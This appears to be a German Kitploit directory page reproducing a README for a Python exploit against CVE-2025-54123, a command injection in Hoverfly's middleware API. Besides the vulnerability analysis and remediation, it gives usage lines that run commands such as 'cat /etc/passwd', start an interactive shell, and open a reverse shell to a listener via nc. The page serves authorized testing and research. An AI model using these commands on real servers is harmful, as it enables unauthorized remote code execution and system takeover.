Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit — Exploit für CVE-2025-54123, eine authentifizierte OS-Command-Injection in Hoverflys Middleware-API, mit Funktionen für reine Prüfung, Einzelbefehle, interaktive Shell und Reverse-Shell für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPapers & ForschungLernen & BildungRed TeamingPayload-Entwicklung
GitHub0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit

Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit

Exploit für CVE-2025-54123, eine authentifizierte OS-Command-Injection in Hoverflys Middleware-API, mit Funktionen für reine Prüfung, Einzelbefehle, interaktive Shell und Reverse-Shell für autorisierte Sicherheitstests.

Repository anzeigen
14vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-54123 — Remote-Code-Ausführung über Hoverfly Middleware API

Authentifizierte RCE durch OS-Befehlseinschleusung in Hoverfly ≤ 1.11.3

Schwachstellenübersicht

EigenschaftWert
CVE IDCVE-2025-54123
CVSS Score9.8 — Critical
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-78 (OS-Befehlseinschleusung), CWE-20 (Unzureichende Eingabevalidierung)
ProduktHoverfly — Open-Source-API-Simulationstool
BetroffenAlle Versionen bis einschließlich 1.11.3
Behoben in1.12.0 (Patch-Commit)
SicherheitshinweisGHSA-r4h8-hfp2-ggmf

Technische Analyse

Hier finden Sie eine ausführliche Fallstudie und technische Analyse aus White-Box- und Black-Box-Perspektive: https://medium.com/@phantom_hat/cve-2025-54123-hoverfly-1-11-3-command-injection-rce-case-study-patch-diffing-aacc092f7f3a

Angriffsfläche

Hoverfly stellt eine RESTful-Admin-API (Standardport 8888) zur Verwaltung von Simulationskonfigurationen bereit. Der Middleware-Verwaltungsendpunkt unter /api/v2/hoverfly/middleware akzeptiert einen JSON-Body mit den Feldern binary und script, die einen externen Middleware-Prozess definieren.

Grundursache

Die Schwachstelle entsteht aus einer Kombination von drei Code-Level-Fehlern:

  1. Unzureichende Eingabevalidierung — middleware.go:93-96: Die Funktion SetBinary() akzeptiert den Parameter binary ohne Validierung oder Bereinigung, was einem Angreifer ermöglicht, beliebige ausführbare Dateien (z. B. bash) anzugeben.

  2. Unsicherer Befehlsausführung — local_middleware.go:14-19: Die Middleware wird über exec.Command() ausgeführt, wobei die vom Angreifer kontrollierten Werte binary und script direkt als Argumente übergeben werden, was eine OS-Befehlseinschleusung ermöglicht.

  3. Sofortige Ausführung während des Tests — hoverfly_service.go:173: Wenn die Middleware über die API gesetzt wird, testet Hoverfly diese sofort, indem es sie ausführt, wodurch der injizierte Befehl bereits zur Konfigurationszeit und nicht erst beim Proxy-Abfangen ausgelöst wird.

Angriffsablauf

root@kitploit:~
Attacker                              Hoverfly (≤ 1.11.3)
   │                                        │
   │─── POST /api/token-auth ──────────────>│  (1) Authenticate
   │<── { "token": "eyJ..." } ─────────────│
   │                                        │
   │─── PUT /api/v2/hoverfly/middleware ───>│  (2) Inject payload
   │    { "binary": "bash",                 │
   │      "script": "<malicious cmd>" }     │
   │                                        │
   │    ┌──────────────────────────────────┐│
   │    │ exec.Command("bash", tmpScript)  ││  (3) Immediate execution
   │    │ → attacker command runs as       ││
   │    │   the Hoverfly process user      ││
   │    └──────────────────────────────────┘│
   │                                        │
   │<── Command output in error response ──│  (4) Exfiltrate output
   │                                        │

Exploit-Nutzung

Voraussetzungen

  • Python 3.8+
  • Gültige Anmeldedaten für die Hoverfly-Admin-API (Standard: admin / konfigurierbares Passwort)

Installation

root@kitploit:~
git clone https://github.com/<your-username>/CVE-2025-54123.git
cd CVE-2025-54123
pip install -r requirements.txt

Betriebsmodi

Nur-Prüfmodus

Überprüfen Sie Erreichbarkeit und Authentifizierung des Ziels ohne Ausnutzung:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -C

Einzelnen Befehl ausführen

Führen Sie einen einzelnen OS-Befehl auf dem Ziel aus:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'id'

Interaktive Pseudo-Shell

Wechseln Sie in eine persistente Shell-Sitzung:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -i

Reverse Shell

Senden Sie eine Reverse-Shell an Ihren Listener:

root@kitploit:~
# Terminal 1 — start listener
nc -lvnp 4444

# Terminal 2 — launch exploit
python3 exploit.py -u http://target:8888 -U admin -P <password> --revshell 10.0.0.1:4444

Ausführlicher Modus mit Proxy

Leiten Sie den Datenverkehr zur Inspektion durch Burp Suite:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'cat /etc/passwd' --proxy -v

Vollständige Flag-Referenz

FlagBeschreibungStandard
-u, --urlZiel-Hoverfly-URLErforderlich
-U, --usernameAdmin-BenutzernameErforderlich
-P, --passwordAdmin-PasswortErforderlich
-c, --commandAuszuführender OS-Befehl—
-C, --checkNur-Prüfmodus (keine Ausnutzung)false
-i, --interactiveInteraktive Pseudo-Shellfalse
--revshellReverse Shell LHOST:LPORT—
--proxyRoute durch 127.0.0.1:8080false
--timeoutZeitüberschreitung der Anfrage (Sekunden)15
-v, --verboseAusführliche Ausgabe aktivierenfalse

Behebung

MaßnahmeEinzelheiten
AktualisierungAktualisieren Sie Hoverfly auf v1.12.0 oder höher, bei dem die Set-Middleware-API standardmäßig deaktiviert ist
NetzwerksegmentierungBeschränken Sie den Zugriff auf die Hoverfly-Admin-API (Port 8888) auf vertrauenswürdige Netzwerke
AuthentifizierungVerwenden Sie starke, eindeutige Passwörter für die Hoverfly-Admin-API
ÜberwachungÜberwachen Sie auf unerwartete PUT-Anfragen an /api/v2/hoverfly/middleware

Patch-Details

Der Fix in Commit 17e60a9 deaktiviert die Set-Middleware-API standardmäßig. Nachfolgende Änderungen an der Dokumentation (Commit a9d4da7) machen Benutzer auf die Sicherheitsauswirkungen der Offenlegung dieses Endpunkts aufmerksam.


Referenzen

  • NVD — CVE-2025-54123
  • GitHub Security Advisory — GHSA-r4h8-hfp2-ggmf
  • Vulnerable Code — hoverfly_service.go#L173
  • Vulnerable Code — middleware.go#L93
  • Vulnerable Code — local_middleware.go#L13
  • Patch Commit — 17e60a9

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und zu Bildungs- und Forschungszwecken bereitgestellt.
Unbefugter Zugriff auf Computersysteme ist nach dem Computer Fraud and Abuse Act (CFAA) und gleichwertigen Gesetzen weltweit illegal.
Der Autor übernimmt keine Haftung für Missbrauch dieser Software.
Holen Sie immer die ausdrückliche schriftliche Genehmigung ein, bevor Sie ein System testen, das Ihnen nicht gehört.


Projektstruktur

root@kitploit:~
CVE-2025-54123/
├── Exploit/
│   ├── exploit.py          # Polished exploit
│   └── raw_exploit.py      # Original raw PoC
├── Images/                 # Research screenshots
├── Reference/              # Reference exploits for study
├── requirements.txt        # Python dependencies
└── README.md               # This file

Autor

Phantom Hat — Sicherheitsforscher


Diese Forschung wurde im Rahmen einer Schwachstellen-Fallstudie zu Bildungszwecken durchgeführt.

Tool herunterladen